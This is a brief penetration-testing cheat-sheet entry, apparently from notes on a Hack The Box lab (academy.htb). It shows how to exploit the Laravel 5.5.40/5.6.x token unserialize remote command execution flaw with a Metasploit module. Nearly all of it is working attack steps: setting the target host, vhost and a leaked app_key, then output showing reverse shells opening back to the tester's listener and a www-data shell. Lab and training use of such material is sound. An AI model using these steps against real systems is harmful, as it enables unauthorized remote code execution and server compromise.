Laravel

PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)

If you somehow find the app_key and Laravel is running any of the vulnerable versions.

msf6 > use exploit/unix/http/laravel_token_unserialize_exec
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set rhosts academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set vhost dev-staging-01.academy.htb
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set app_key dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
msf6 exploit(unix/http/laravel_token_unserialize_exec) > set lhost 10.10.14.3
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run

[*] Started reverse TCP handler on 10.10.14.3:4444
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.215:51084) at 2020-12-07 12:47:57 +0100
[*] Command shell session 2 opened (10.10.14.3:4444 -> 10.10.10.215:51086) at 2020-12-07 12:47:58 +0100

whoami
www-data

Last updated 6 months ago